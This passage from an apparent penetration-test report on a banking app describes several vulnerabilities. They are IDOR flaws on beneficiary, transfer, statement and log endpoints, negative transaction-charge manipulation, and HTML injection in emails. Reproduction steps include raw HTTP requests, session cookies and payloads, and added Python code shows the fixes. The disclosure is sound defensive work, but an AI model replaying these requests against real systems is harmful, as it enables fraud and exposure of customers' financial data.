Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

{"beneficiary_id":4803}
3. Change the beneficiary_id in the POST body to the victim's beneficiary_id (take the ID from a victim account you control for confirmation) and send the request to the server.
4. Observe that the beneficiary is deleted successfully.
POC:
Beneficiary deleted using broken access control on /api/delete_beneficiary
Impact:
The impact is Critical. This vulnerability allows an attacker to cause
unauthorized data loss and impair the functionality of other users'
accounts. By deleting beneficiaries, the attacker disrupts the victim's ability
to easily make future financial transfers, causing a loss of Integrity and
Availability of user-defined data. This breach of trust and core security
principle severely affects the application's reliability.
Vuln #14 Critical
Title: Broken Access Control (BAC/IDOR) on /api/cancel_scheduled_transfer via transfer_id leads to cancelling any scheduled transfer of other users
Vulnerable path: [Link]r
Description:
This vulnerability is a Broken Access Control flaw, specifically an Insecure
Direct Object Reference (IDOR), in the
/api/cancel_scheduled_transfer endpoint. The application uses
the transfer_id POST parameter to identify the scheduled transfer but
lacks crucial authorization checks to verify the requesting user is the
owner of that transfer ID. This allows any authenticated attacker to supply a
victim's transfer ID and successfully cancel the victim's future scheduled
payments, causing unauthorized data modification and financial disruption.
Steps to reproduce:
1. Log in to the Cha Bank account.
2. Either intercept the scheduled transfer cancel request, or replace any raw API request with the following raw request (substituting your own session cookie) and send it to the server:
POST /api/cancel_scheduled_transfer HTTP/2
Host: [Link]
Cookie: session=eyJhY2NvdW50X251bWJlciI6IjEwMDE4MzM3OTQzMCIsImF1ZGl0X2xvZ2dlZCI6dHJ1ZSwiZnVsbF9uYW1lIjoiJ1wiPjxoMT52aWN0aW0iL[Link].d2g-FO9jg-QuEPIRrbY_K8nqe-w
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: [Link]
Content-Type: application/json
Content-Length: 19
Origin: [Link]
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Pwnfox-Color: orange
Priority: u=0
Te: trailers

{"transfer_id":271}
3. Change the transfer_id in the POST body to the victim's transfer_id (take the ID from a victim account you control for confirmation) and send the request to the server.
4. Observe that the scheduled transfer is cancelled successfully.
POC:
Scheduled transfer cancelled using broken access control on /api/cancel_scheduled_transfer
Impact:
The impact is Critical. This flaw allows an attacker to manipulate the
financial operations of other users, leading to the disruption of scheduled
payments (loss of Availability and Integrity). This can cause victims to
incur late fees, service cutoffs, or other financial penalties due to payments
not being executed. The ability to arbitrarily cancel a core financial function
severely compromises user trust and the reliability of the banking
application.
Vuln #15 Critical
Title: Broken Access Control (BAC/IDOR) on /api/generate_statement via account_number leads to creating and downloading balance statements
Vulnerable path: [Link]
Description:
This vulnerability is a Broken Access Control flaw, specifically an Insecure
Direct Object Reference (IDOR), found in the
/api/generate_statement endpoint. The application uses the
account_number POST parameter to specify which account statement to
generate, but it lacks proper authorization checks. This allows any
authenticated attacker to provide a victim's account number and
successfully trigger the generation and subsequent download of that
victim's financial statement, leading to unauthorized access to sensitive
financial history.
Steps to reproduce:
1. Log in to the Cha Bank account.
2. Either intercept the generate statement request, or replace any raw API request with the following raw request (substituting your own session cookie) and send it to the server:
POST /api/generate_statement HTTP/2
Host: [Link]
Cookie: session=eyJhY2NvdW50X251bWJlciI6IjEwMDE4MzM3OTQzMCIsImF1ZGl0X2xvZ2dlZCI6dHJ1ZSwiZnVsbF9uYW1lIjoiJ1wiPjxoMT52aWN0aW[Link].d2g-FO9jg-QuEPIRrbY_K8nqe-w
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: [Link]
Content-Type: application/json
Content-Length: 33
Origin: [Link]
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Pwnfox-Color: orange
Priority: u=0
Te: trailers

{"account_number":"100183379430"}
3. Change the account_number in the POST body to the victim's account_number (take the account number from a victim account you control for confirmation) and send the request to the server.
4. Observe that the statement is generated successfully.
5. Download the statement using the following URL (replacing the PDF file name):
[Link]oad?file=statement_100183379430_20251122162140.pdf
POC:
Statement generated using broken access control on /api/generate_statement
Impact:
The impact is Critical. This vulnerability allows an attacker to gain full
access to a victim's financial history and personal data (e.g., transaction
details, full name, address, and balance over time) stored within the bank
statements. This results in a massive breach of Confidentiality and
provides attackers with data that can be used for sophisticated social
engineering or identity theft, severely compromising user privacy and trust
in the banking service.
Vuln #16 Critical
Title: Broken Access Control (BAC/IDOR) on /api/transaction_logs via GET parameter account leads to access to other users' transaction logs
Vulnerable path: [Link]
Description:
This vulnerability is a Broken Access Control flaw, specifically an Insecure
Direct Object Reference (IDOR), in the /api/transaction_logs
endpoint. The application relies on the account GET parameter to retrieve
transaction data but fails to validate ownership. Any authenticated attacker
can modify the account parameter with a victim's account number and
successfully bypass authorization, gaining unauthorized access to the
victim's complete financial transaction history.
Steps to reproduce:
1. Log in to the Cha Bank account.
2. Navigate to the following URL:
[Link]ransaction_logs?account=100123312938
3. Change the account GET parameter to the victim's account number and send the request to the server (use the account number of a victim account you control for confirmation).
4. Observe the victim's transaction logs in the response.
POC:
Transaction logs of other users retrieved using broken access control on /api/transaction_logs
Impact:
The impact is Critical. This IDOR vulnerability directly compromises the
Confidentiality of all users' financial records. An attacker can access
sensitive, private transaction data, revealing spending habits, financial
relationships, and potentially large-scale PII (personally identifiable
information) when correlated with other findings. This level of financial
data disclosure is severe, leading to profound user privacy breaches,
potential regulatory penalties, and a complete loss of trust in the platform.
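Findings #8, #13, #14, #15 and #16 share one fix: the owning account is taken from the server-side session and the database query is scoped by it, so a foreign identifier simply matches nothing. Finding #4 needs a different check, a role requirement on the function itself. The block below is an added example, not the application's code; the schema, the role field in the session and the sample account numbers are constructed for the demonstration:

```python
# Added example (not the Cha Bank code): object-level checks for the
# beneficiary, scheduled-transfer, statement/balance and transaction-log
# endpoints, and the function-level (role) check /api/add_balance lacks.
import sqlite3

ADMIN_ROLE = "admin"


class Forbidden(Exception):
    """Authenticated, but not authorized for this object or function."""


def build_demo_db():
    """Constructed fixture: two customers (account numbers reused from the
    report's requests), one operator, and objects owned by each customer."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE accounts (account_number TEXT PRIMARY KEY, role TEXT NOT NULL,
                               balance_cents INTEGER NOT NULL);
        CREATE TABLE beneficiaries (beneficiary_id INTEGER PRIMARY KEY,
                                    owner_account TEXT NOT NULL, name TEXT);
        CREATE TABLE scheduled_transfers (transfer_id INTEGER PRIMARY KEY,
                                          owner_account TEXT NOT NULL, status TEXT);
        CREATE TABLE transactions (id INTEGER PRIMARY KEY, account TEXT NOT NULL,
                                   amount_cents INTEGER, memo TEXT);
    """)
    conn.executemany("INSERT INTO accounts VALUES (?,?,?)", [
        ("100123312938", "customer", 50_000),
        ("100183379430", "customer", 120_000),
        ("100000000001", ADMIN_ROLE, 0)])
    conn.executemany("INSERT INTO beneficiaries VALUES (?,?,?)", [
        (4803, "100123312938", "attacker's payee"),
        (4804, "100183379430", "victim's payee")])
    conn.executemany("INSERT INTO scheduled_transfers VALUES (?,?,?)", [
        (271, "100123312938", "pending"), (272, "100183379430", "pending")])
    conn.executemany("INSERT INTO transactions VALUES (?,?,?,?)", [
        (1, "100183379430", -2500, "victim rent"),
        (2, "100123312938", 1000, "attacker top-up")])
    return conn


def require_own_account(session, requested_account=None):
    """Shared check for /api/balance, /api/generate_statement and
    /api/transaction_logs: the only account a customer may name is the one
    in their server-side session. A differing client value is refused, not
    silently replaced, so the attempt is visible in logs."""
    own = session["account_number"]
    if requested_account not in (None, own):
        raise Forbidden("account does not belong to the current session")
    return own


def delete_beneficiary(conn, session, beneficiary_id):
    """Object-level check done in the query itself: a foreign or unknown id
    matches zero rows, which the rowcount exposes without a second lookup."""
    with conn:
        cur = conn.execute(
            "DELETE FROM beneficiaries WHERE beneficiary_id = ? AND owner_account = ?",
            (beneficiary_id, session["account_number"]))
    if cur.rowcount != 1:
        raise Forbidden("beneficiary not found for this account")
    return {"deleted": beneficiary_id}


def cancel_scheduled_transfer(conn, session, transfer_id):
    with conn:
        cur = conn.execute(
            "UPDATE scheduled_transfers SET status = 'cancelled' "
            "WHERE transfer_id = ? AND owner_account = ? AND status = 'pending'",
            (transfer_id, session["account_number"]))
    if cur.rowcount != 1:
        raise Forbidden("scheduled transfer not found for this account")
    return {"cancelled": transfer_id}


def transaction_logs(conn, session, requested_account=None):
    account = require_own_account(session, requested_account)
    return conn.execute("SELECT id, amount_cents, memo FROM transactions "
                        "WHERE account = ? ORDER BY id", (account,)).fetchall()


def add_balance(conn, session, account_number, amount_cents):
    """Function-level check for /api/add_balance: crediting an account is an
    operator action, and the role comes from the session, not the request."""
    if session.get("role") != ADMIN_ROLE:
        raise Forbidden("add_balance requires the admin role")
    if not isinstance(amount_cents, int) or amount_cents <= 0:
        raise ValueError("amount must be a positive number of cents")
    with conn:
        cur = conn.execute("UPDATE accounts SET balance_cents = balance_cents + ? "
                           "WHERE account_number = ?", (amount_cents, account_number))
    if cur.rowcount != 1:
        raise ValueError("unknown account")
    new_balance = conn.execute("SELECT balance_cents FROM accounts WHERE account_number = ?",
                               (account_number,)).fetchone()[0]
    return {"account_number": account_number, "balance_cents": new_balance}


def is_forbidden(call):
    """True when `call()` raises Forbidden (used by the checks)."""
    try:
        call()
    except Forbidden:
        return True
    return False
```

Scoping the DELETE and UPDATE by owner_account in the statement itself avoids the lookup-then-act race that a separate "SELECT owner" check would introduce, and returning the same error for missing and foreign ids stops the endpoint from confirming which ids exist. The statement file name from Vuln #15 should be checked against require_own_account in the same way before the PDF is served.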
Vuln #17 Critical
Title: Business logic error in /api/transfer via POST parameter transaction_charge allows attacker to control transaction_charge
Vulnerable path: [Link]
Description:
This vulnerability is a Business Logic Error (BLE) in the fund transfer
functionality exposed via the /api/transfer endpoint. The application
fails to validate or enforce server-side calculation of the transaction
charge, instead allowing the user to supply this value via the
transaction_charge POST parameter. This permits an authenticated
attacker to inject a controlled, low, or even negative charge, effectively
avoiding the intended fee structure and potentially receiving a refund for
the fee, compromising the bank's revenue model.
Steps to reproduce:
1. Log in to the Cha Bank account.
2. Click "Transfer money" on the user dashboard.
3. Fill in the form, submit it, and intercept the POST request to /api/transfer.
4. Add a transaction_charge parameter with a negative value such as -100 and send the request to the server.
5. Observe that the normal transaction charge is not deducted from the balance; the supplied value is used instead. An attacker can use this to reduce or eliminate the transaction charge.
6. Repeat steps 2-5 two or three times to confirm.
POC:
Transaction charge successfully controlled by the client
"transaction_charge":-1000
Impact:
The impact is Critical (Financial Integrity). This Business Logic Error allows
any authenticated user to bypass the bank's intended revenue mechanism
by eliminating or even reversing transaction fees. This leads to direct,
continuous financial loss for the bank and undermines the fundamental
Integrity of the application's core financial rules. The vulnerability can be
exploited at scale to execute numerous fee-free transactions, causing
significant revenue leakage.
Vuln #18 Critical
Title: Business logic error in /api/international_transfer via POST parameter transaction_charge allows attacker to control transaction_charge
Vulnerable path: [Link]
Description:
This vulnerability is a Business Logic Error (BLE) in the international
transfer functionality exposed via the /api/international_transfer
endpoint. The application fails to properly validate or enforce the
server-side calculation of the transaction fee, allowing the user to inject a
controlled fee value via the transaction_charge POST parameter. This
flaw permits an authenticated attacker to bypass the bank's fee structure
by setting a nominal, zero, or even a negative charge, effectively
compromising the intended financial logic and revenue stream.
Step to reproduce:
1. Log in to the Cha bank account.
2. Navigate to [Link].
3. Fill in the form, submit it, and intercept the resulting POST request to /api/international_transfer.
4. Add a parameter transaction_charge with a negative value such as -100 and send the request to the server.
5. Observe that the supplied transaction_charge is not deducted from the balance. An attacker can use this vulnerability to reduce the transaction_charge.
6. Repeat the above steps 2-3 times for confirmation.
POC:
Successfully controlled the transaction charge
Impact:
The impact is Critical (Financial Integrity). This Business Logic Error allows
any authenticated user to bypass and control the bank's intended revenue
mechanism for international transfers. By eliminating or reversing
transaction fees, the vulnerability leads to direct, continuous financial loss
for the bank and fundamentally compromises the Integrity of the
application's financial rules. The ability to execute fee-free transactions can
be scaled, resulting in significant revenue leakage and system abuse.
Vuln #19 Critical
Title: Business logic Error in /api/pay_bill via POST parameter
transaction_charge allows attacker to control transaction_charge
Vulnerable path: [Link]
Description:
This vulnerability is a Business Logic Error (BLE) in the bill payment
functionality exposed via the /api/pay_bill endpoint. The application
insecurely allows an authenticated attacker to introduce and control the
transaction_charge POST parameter. Instead of the charge being
calculated and enforced server-side, the system uses the client-supplied
value, permitting the attacker to set a nominal, zero, or even a negative
charge. This flaw allows users to bypass intended fees and potentially gain
unauthorized credits.
Step to reproduce:
1. Log in to the Cha bank account.
2. Navigate to [Link].
3. Select any category, fill in the form, submit it, and intercept the resulting POST request to /api/pay_bill.
4. Add a parameter transaction_charge with a negative value such as -100 and send the request to the server.
5. Observe that the supplied transaction_charge is not deducted from the balance. An attacker can use this vulnerability to reduce the transaction_charge.
6. Repeat the above steps 2-3 times for confirmation.
POC:
Successful balance add using negative amount
Impact:
The impact is Critical (Financial Integrity). This Business Logic Error allows
any authenticated user to bypass the bank's intended fee structure for bill
payments, leading to direct, continuous revenue loss for the bank. By
controlling the fee, the attacker compromises the financial rules of the
system, which can be scaled to execute numerous fee-free transactions,
significantly impacting the application's profitability and reliability.
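Vuln #17, #18 and #19 share one root cause: the server accepts a client-supplied transaction_charge instead of computing the fee itself. The following is an added example written for this report, not code from the report or from the bank application it describes. It shows the weak pattern beside a hardened handler; the endpoint kinds, fee rates, field names and balances are assumptions for illustration, since the report states none of them.

```python
"""Added example (not the report's or the application's code): client-trusted
fee handling beside a server-side fee calculation. Fee rates, field names and
balances are assumed for illustration."""
from dataclasses import dataclass
from decimal import Decimal, InvalidOperation, ROUND_HALF_UP

# Assumed fee schedule per endpoint kind, as a rate of the amount moved.
FEE_SCHEDULE = {
    "transfer": Decimal("0.0100"),
    "international_transfer": Decimal("0.0250"),
    "pay_bill": Decimal("0.0050"),
}
MIN_FEE = Decimal("1.00")   # assumed floor so tiny payments are never free
CENT = Decimal("0.01")


@dataclass
class Account:
    balance: Decimal


def open_account(balance: str = "1000.00") -> Account:
    """Constructed test account; balances use Decimal, never float."""
    return Account(Decimal(balance))


class TransferError(ValueError):
    """Raised for any request the hardened handler refuses."""


def compute_fee(kind: str, amount: Decimal) -> Decimal:
    """Server-side fee: the only source of truth for the transaction charge."""
    fee = (amount * FEE_SCHEDULE[kind]).quantize(CENT, rounding=ROUND_HALF_UP)
    return max(fee, MIN_FEE)


def parse_amount(raw) -> Decimal:
    """Accept only a finite, positive amount with at most two decimals."""
    try:
        amount = Decimal(str(raw))
        ok = amount.is_finite() and amount > 0 and amount == amount.quantize(CENT)
    except InvalidOperation:
        ok = False
    if not ok:
        raise TransferError("amount must be positive with at most two decimals")
    return amount


def vulnerable_transfer(account: Account, body: dict, kind: str = "transfer") -> Decimal:
    """Pattern the report describes: a transaction_charge field in the request
    replaces the computed fee, so a negative charge credits the account."""
    amount = Decimal(str(body["amount"]))
    charge = Decimal(str(body.get("transaction_charge", compute_fee(kind, amount))))
    account.balance -= amount + charge
    return charge


def hardened_transfer(account: Account, body: dict, kind: str = "transfer") -> Decimal:
    """Fix: reject unknown fields outright, validate the amount, compute the
    fee server-side and check funds against amount plus fee before debiting."""
    unexpected = set(body) - {"amount", "recipient"}
    if unexpected:
        raise TransferError(f"unexpected fields: {sorted(unexpected)}")
    amount = parse_amount(body["amount"])
    fee = compute_fee(kind, amount)
    if account.balance < amount + fee:
        raise TransferError("insufficient funds")
    account.balance -= amount + fee
    return fee


def rejects(handler, account: Account, body: dict, kind: str = "transfer") -> bool:
    """True if the handler refuses the request and leaves the balance untouched."""
    before = account.balance
    try:
        handler(account, body, kind)
    except TransferError:
        return account.balance == before
    return False


if __name__ == "__main__":
    # Constructed request mirroring the report's PoC value ("transaction_charge": -1000).
    poc = {"amount": 500, "recipient": "acct-123", "transaction_charge": -1000}
    a = open_account()
    vulnerable_transfer(a, poc)
    print("vulnerable handler balance:", a.balance)   # 1500.00: the account gained money
    print("hardened handler rejects PoC:", rejects(hardened_transfer, open_account(), poc))
```

Rejecting the unexpected field, rather than silently ignoring it, is deliberate: a request carrying transaction_charge is either a client bug or probing, and both are worth a log entry. The same handler shape serves all three endpoints, which is the point: the fee rule lives in one server-side function and nowhere in the request.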
Vuln #20 Medium
Title: HTML injection via email
Vulnerable path:
[Link]
Description:
This vulnerability is an HTML Injection flaw occurring during the account
registration process. The application fails to properly sanitize the user's
input in the name field before incorporating it into an outbound email (e.g.,
a welcome email or notification sent to the victim user). This allows an
attacker to inject arbitrary HTML tags, such as <h1>, which are then
rendered by the victim's email client, leading to a defacement or change in
the email's appearance.
Step to reproduce:
1. Register an account with HTML h1 tags in the name field, such as '"><h1>test
2. Observe the email with the injected HTML in the victim's inbox.
POC:
HTML injection in email
Impact:
The impact of standard HTML Injection in an email is generally rated as
Low to Medium. The primary risks are reputational damage and
defacement, as an attacker can manipulate the look and feel of official
emails. However, if the victim's email client (or webmail interface) does not
strictly sanitize HTML, this flaw could potentially be leveraged for phishing
or escalation to a self-executing XSS payload, although that requires a
specific environment and is a higher-risk scenario.
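The defect behind Vuln #20 is raw user input spliced into an HTML email body. The following is an added example written for this report, not code from the report or from the application it describes. It places that pattern beside two defensive layers, an allow-list check on the name at registration and HTML escaping at the point of output, and includes a check that counts tags the template did not contain. The welcome template and the name policy are assumptions.

```python
"""Added example (not the report's or the application's code): unsanitised
name-in-email rendering beside input validation and output escaping. The
template text and the name policy are assumed."""
import html
import re
import unicodedata

MAX_NAME_LEN = 80

# Assumed welcome template; the real email content is not in the report.
WELCOME_TEMPLATE = (
    "<html><body><h1>Welcome to the bank, {name}!</h1>"
    "<p>Your account has been created.</p></body></html>"
)

_TAG_RE = re.compile(r"</?([A-Za-z][A-Za-z0-9]*)")
_TEMPLATE_TAG_COUNT = len(_TAG_RE.findall(WELCOME_TEMPLATE))


def valid_display_name(name: str) -> bool:
    """Layer 1 (registration): allow-list of letters in any script plus
    space, period, apostrophe and hyphen; must start with a letter."""
    name = unicodedata.normalize("NFC", name)
    if not 1 <= len(name) <= MAX_NAME_LEN or not name[0].isalpha():
        return False
    return all(ch.isalpha() or ch in " .'-" for ch in name)


def render_welcome_unsafe(name: str) -> str:
    """Pattern the report describes: the name is inserted verbatim, so any
    tags it carries are rendered by the recipient's mail client."""
    return WELCOME_TEMPLATE.format(name=name)


def render_welcome(name: str) -> str:
    """Layer 2 (output): escape <, >, &, quotes at the point of insertion."""
    return WELCOME_TEMPLATE.format(name=html.escape(name, quote=True))


def extra_tag_count(rendered: str) -> int:
    """Tags in the rendered email beyond those the template itself contains;
    anything above zero means user input produced markup."""
    return len(_TAG_RE.findall(rendered)) - _TEMPLATE_TAG_COUNT


def build_welcome_email(name: str) -> str:
    """Both layers together: refuse a non-name, then escape what remains."""
    if not valid_display_name(name):
        raise ValueError("display name contains characters outside the allowed set")
    return render_welcome(name)


if __name__ == "__main__":
    # Constructed input mirroring the report's PoC payload in the name field.
    poc_name = "'\"><h1>test"
    print("registration accepts PoC name:", valid_display_name(poc_name))       # False
    print("extra tags, unsafe render:", extra_tag_count(render_welcome_unsafe(poc_name)))  # 1
    print("extra tags, escaped render:", extra_tag_count(render_welcome(poc_name)))        # 0
    print(build_welcome_email("Mary-Jane O'Neil"))
```

Escaping at output is the layer that actually closes the bug: the allow-list can be loosened later for legitimate names, and a legacy record that predates validation still reaches the template, so the template must never trust its inputs. The tag-count check is a cheap regression test to keep beside the template.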